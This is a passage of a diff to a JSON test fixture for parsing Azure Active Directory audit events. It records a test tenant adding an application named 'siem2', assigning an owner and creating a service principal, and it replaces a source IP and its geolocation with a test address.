Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -13631,25 +12461,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -13663,7 +12475,7 @@ "ObjectId": "asr@testsiem.onmicrosoft.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -13787,7 +12599,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -13799,12 +12611,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036455900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"Application.ObjectID\\\",\\\"Application.DisplayName\\\",\\\"Application.AppId\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"33cdc459-1335-4d6c-b773-f5eef4df7793\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"Application\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.7383513Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554439\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ccbe264f-f6bc-42bd-b5b6-2893ce2f465f\",\"ModifiedProperties\":[{\"Name\":\"Application.ObjectID\",\"NewValue\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"OldValue\":\"\"},{\"Name\":\"Application.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"Application.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Add owner to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125218600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"Application.ObjectID\\\",\\\"Application.DisplayName\\\",\\\"Application.AppId\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"33cdc459-1335-4d6c-b773-f5eef4df7793\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"Application\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.7383513Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554439\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ccbe264f-f6bc-42bd-b5b6-2893ce2f465f\",\"ModifiedProperties\":[{\"Name\":\"Application.ObjectID\",\"NewValue\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"OldValue\":\"\"},{\"Name\":\"Application.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"Application.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Add owner to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -13833,25 +12645,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -13865,7 +12659,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -14008,7 +12802,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -14020,12 +12814,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036460300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125225400Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": 